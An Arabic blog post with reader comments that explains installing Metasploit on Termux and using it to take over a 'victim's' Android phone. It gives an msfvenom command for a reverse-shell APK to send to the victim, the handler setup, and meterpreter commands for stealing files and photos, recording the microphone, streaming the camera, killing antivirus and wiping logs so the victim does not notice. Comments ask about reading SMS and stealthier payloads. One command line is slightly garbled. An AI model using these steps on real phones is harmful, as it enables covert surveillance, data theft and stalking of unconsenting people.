السبت، 20 يوليو 2019

تثبيت اداه الميتاسبلوت علي Termux واختراق جهاز الضحيه وجلب الصور والبينات الخاص من termux بامرين فقط

السلام عليكم ورحمة الله وبركاته 

شرح تثبيت اداه الميتاسبلوت علي termux بامرين فقط واختراق جهاز الضحيه
  الميتاسبلويت فرامورك / metasploit framework  
هي اداة غنية عن التعريف حيث تحتوي على العديد من الثغرات و استغلالها في اختبار الاختراق (اختراق هواتف ، حواسيب ، مواقع...والحصول علي صور وبينات الضحيه...... الخ) وهي بالمناسبة مبرمجة بلغة ruby
ويمكنك من خلال هذه الاداه metasploit-framework يعد تثبيت اداه الميتاسبلوت يمكنك انشاء بايلود وعمل رابط وارساله للضحيه واختراق الهاتف او الجهاز باكمله والحصول علي بيناته من الصور وايضا يمكنك اخذ نسخه من ملفات الضحيه وفيما يلي شرح تثبيت الاداه وبدأ الاختراق بها. 
والان اصبح يمكن تثبيتها من تطبيق ترمكس بأمرين فقط وهما : 
apt update && apt upgrade -y 
هذا الامر لتحديث الحزم داخل termux لتجنب حدوث مشاكل (: 

pkg install unstable-repo -y 

pkg install metasploit 

وسوف يطلب منك  الموافقه اكتب له حرف y ومن ثم انتر وسوف يكمل التحميل بدون مشاكل وسوف تأخذ منك بعض الوقت على حسب قوة الانترنت عندك و عندما تكمل التثبيت تفتحها بالامر 
msfconsole 





والان اوامر اختراق الضحيه وصنع البايلود الاختراق 


اوامر اختراق بالميتاسبلويت
أولا صنع بايلود :

./msfvenom -p android/meterpreter/reverse_tcp http://127.0.0.1 lport=4444 r > /sdcard/venom.apk
طبعا ضع في مكان كلمة lhost الإيبي الخاص بك وفي مكان lport ضع البورت اي بورت مفتوح في الروتر او البورت الخاص بالميتا 4444
ثانيا أمر فتح أداة MetaSploit :

./msfconsole

ثالثا بعد الدخول على أداة MetaSploit :

$ use exploit/multi/handler 

$ set payload android/meterpreter/reverse_tcp

$ set lhost ...... الايبي

$ set lport ......البوررت 4444

$ run

$ help

$ shell

$ cd /sdcard

$ ls
رابعا أوامر التحكم في الضحيه :

لإعادة تشغيل جهاز الضحية :
 reboot 
-------------------------------------------------
 لإطفاء جهاز الضحية :
 shutdown 
------------------------------------------------ 
 لإظهار معلومات حول نظام الضحية مثل نظام التشغيل و لغة الجهاز :
 sysinfo 
-----------------------------------------------
 لإلتقاط صورة من شاشة الضحية : 
screenshot 
---------------------------------------------- 
 لإظهار اتصالات الشبكة وجميع التطبيقات و الملفات المتصلة بالأنترنت و المستهلكة للأنترنت : 
netstat 
--------------------------------------------- 
 للدخول الى الملفات الداخليه و كتابة الأوامر وكأنك في جهاز الضحية : 
shell 
--------------------------------------------- 
لإقلاع أي تطبيق على جهاز الضحية بأمر واحد منك أكتب هذا الأمر : 
execute -f Ahmed.apk 
طبعا غير Ahmed إلى إسم التطبيق الذي تريده أن يشتغل.
--------------------------------------------- 
لإظهار جميع البرامج التي تشتغل في جهاز الضحية اكتب : 
ps 
--------------------------------------------- 
 لرفع أي ملف من عندك الى جهاز الضحية : مثال : upload /sdcard/Ahmed.apk \Ahmed.apk
استبدل Ahmed بإسم الملف أو التطبيق أو اي شيء تريد رفعه.
طبعا هذا بعد الدخول الى مكان التطبيق أو الصوره أو أي شيء وطبعا للدخول إلى ملفات الضحيه نفذ هذا الأمر :
cd /sdcard
--------------------------------------------- 
 لتحميل أي ملف أو صورة من جهاز الضحية الى جهازك : 
download Ahmed.apk
غير اسم Ahmed الى اسم الملف و أيضا صيغة apk الى صيغة الملف.
طبعا هذا بعد الدخول الى مكان التطبيق أو الصوره أو أي شيء وطبعا لدخول إلى ملفات الضحيه أطلب الأمر :
cd /sdcard
--------------------------------------------- 
أوامر مهمه :
أولا هذا الامر :
بعد دخولك مباشر على الضحيه 
cd /sdcard
                        sdcard هذا مكان الذاكره الداخليه
أما اذا طلبت 
cd /sdcard1
                    sdcard1 هذا مكان الذاكره الخارجيه
أما معنى cd فهو أمر فتح الملفات 
يمكنك أن تكتب أمر .. cd للرجوع الى الوراء
وأيضا للدخول لملف أكتب :
 cd Ahmed
قم بإستبدال Ahmed بإسم الملف الذي تريد ذهاب اليه.
أما هذا الأمر pwd يبين لك اسم المكان الذي تتواجد به من البدايه للنهايه.
وأيضا هذا الأمر ls يظهر لك الملفات الموجودة و أين أنت أيضا.
وأيضا Ctrl+l هذا لمسح الكلام الذي يتواجد في الشاشه.

----------------------------------------------- 
هذا الأمر لحذف أي ملف : 
rm (Ahmed)
قم بإستبدال Ahmed الى الملف او البرنامج او الصورة الذي تريد ان تحذفها.
-----------------------------------------------  
لإغلاق جلسة الاختراق لفترة معينة من الزمن طبعا هذا مهم حتى لا يشك الضحية : 
sleep 5 
غير 5 الى عدد الثواني التي تحب فيها غلق جلسة الاختراق يمكنك وضع ساعة عن طريق كتابة 3600 أي 3600 تانية = ساعة.
----------------------------------------------- 
لمسح سجل الأحدات و الإختراق (تفيد في الحماية) : clearev 
----------------------------------------------- 
هذا الأمر مفيد جدا دوره تعطيل جميع مضادات الفيروسات في جهاز الضحية : 
run killav.rb 
----------------------------------------------- 
للتجسس على مايك mic الخاص بالضحية و سماع كل ما يقوله الضحية : 
record_mic -d 5 
غير 5 الى عدد الـثواني الذي تريد تسجيل الصوت فيها متلا 60 يسجل كل ما يقوله الضحية لمدة دقيقة. 
طبعا الزمن بالتانية s 
---------------------------------------------- 
لإلتقاط صورة من كاميرا الجهاز :
 webcam_snap 
---------------------------------------------- 
لمشاهدة كل ما يفعله الضحية من الكاميرا أي التجسس على الكاميرا : 
webcam_stream -d 60 
غير 60 الى عدد الثواني الذي تريده.

وهذه أوامر الأخرى :

1-bgkill قفل برامج الضحية
2-bglis البرامج التي شغالة عند الضحية
3-exit للخروج
4-help للمساعدة
5-info استخراج معلومات
6-migrate للعب بالبروسسر و تنقل الباك دور
7-read للقراءة
8-run لتشغيل برامج الضحية
9-use است
اخمط بذكر المصدر

   رجائا اترك تعليق 

27 تعليقات:

في 28 نوفمبر 2019 في 7:04 م , Blogger Brahim maryano يقول...

عندما اكتب msfconsole يضهر لي No sush fill or directory هل يمكنك الذهاب للخاص للشرح لي اكتر

 
في 20 ديسمبر 2019 في 8:32 م , Blogger Unknown يقول...

عندما اكتب امر msfconsole تظهر لي هذه الرسالة Traceback (most recent call last):
ruby: no Ruby script found in input (LoadError)

 
في 5 يناير 2020 في 10:36 م , Blogger Xxxxvideo يقول...

Hj

 
في 6 مايو 2020 في 3:38 م , Blogger Unknown يقول...

اريد دخول الى sms كيف

 
في 13 مايو 2020 في 11:59 ص , Blogger Unknown يقول...

يابة شنو هاي مو اداة صاله ساعتين ومفاتحة

 
في 21 مايو 2020 في 5:52 ص , Blogger DZ Technologies يقول...

عند صنع البايلود واريد فتح جلسة تنصت واضع جميع المعلومات واكتب امر run تاتي هذه الرسالة
Unknown command: run.

 
في 22 مايو 2020 في 7:06 ص , Blogger Unknown يقول...

جرب exploit

 
في 23 يونيو 2020 في 1:36 ص , Blogger فريق الدعم يقول...

كيفيه عمل بايلود

 
في 25 يونيو 2020 في 3:05 م , Blogger Mahmoud Said يقول...

يجماعة المدونة كلامها صح بس عاوز حد يكون فاهم في تريمكس او كالي لينكس

 
في 29 يونيو 2020 في 1:25 م , Blogger Unknown يقول...

انا بدي رابط تنزيل متاسبلويت ياجماعة دورت في البلاي ستور مالاقيتو

 
في 22 يوليو 2020 في 1:49 م , Blogger Unknown يقول...

صديقي انت عم تشتغل على الترميكس لزم تنزل الاداه من الجيت هاب

 
في 30 يوليو 2020 في 6:48 ص , Blogger ahmed elmasry يقول...

هو فين كلمه lhost

 
في 13 أكتوبر 2020 في 10:26 ص , Blogger ‏Wageh ‎Gamal يقول...

بعد ما بكتب run مفيش حاجة مفيش حاجة بتحصل

 
في 1 يناير 2021 في 5:51 ص , Blogger Unknown يقول...

صح بيفضل ومافيش حاجه بتطلع

 
في 30 يونيو 2021 في 11:10 م , Blogger AhmedTechno يقول...

ممكن رابط الاداه متا سبلويت للاندرويد

 
في 18 أغسطس 2021 في 7:11 ص , Blogger Unknown يقول...

كيف بوصل للضحيه وانا كتبت ال ip حقي وليس حقه

 
في 10 سبتمبر 2021 في 1:42 م , Blogger Unknown يقول...

عندما اكتب امر لتجسس تظهرلي
lfileprovider) > bgkill
[-] Unknown command: bgkill
msf6 auxiliary(gather/android_htm
lfileprovider) >

 
في 2 نوفمبر 2021 في 5:58 ص , Blogger Unknown يقول...

لازم تكتب run بعدين اسم البرنامج

 
في 27 نوفمبر 2021 في 10:15 ص , Blogger Unknown يقول...

انا أعلم أن هذا بايلود حصان الطرواد وسهل الاكتشاف هل يمكنك أن تعلمني بي بايلودات أخرى

 
في 17 ديسمبر 2021 في 5:55 ص , Blogger Unknown يقول...

dump_sms ومن ثم افتح صفحه جديده واكتب cd ~ ثم ls ومن ثم انسخ الأمر الذي فيه sms واكتب mv والصق الامر

 
في 17 ديسمبر 2021 في 5:56 ص , Blogger Unknown يقول...

اعتقد في خطا بالاداه

 
في 17 ديسمبر 2021 في 5:58 ص , Blogger Unknown يقول...

أداة الميتاسلوبت حجمها 5 جيجا موجوده معك أو لا ....
اذا موجوده حطها بالذاكرة الداخلي ومن ثم تكتب اومر وتفك الضغط التريمكس وبعدها بتشتغل معك الميتاسلوبت

 
في 17 ديسمبر 2021 في 6:00 ص , Blogger Unknown يقول...

لانه بينحفظ حقك ويتغير بدله حق الضحيه ولما تخلص تعود الأمور إلى مسارها

 
في 17 ديسمبر 2021 في 6:00 ص , Blogger Unknown يقول...

في بايلودات كتير لكن من الصعب انك بتلاقيها في المواقع

 
في 27 ديسمبر 2021 في 8:10 ص , Blogger Unknown يقول...

لوووو سمحت كيف تنزل الاداه من الجيب هاب يعني ايش اعمل .. ارجو الرد على رسالتي .

 
في 27 ديسمبر 2021 في 8:12 ص , Blogger Unknown يقول...

ممكن تشرح لي

 
في 6 مارس 2022 في 10:22 م , Blogger Unknown يقول...

جرب تكتب الامر exploit

 

إرسال تعليق

الاشتراك في تعليقات الرسالة [Atom]

<< الصفحة الرئيسية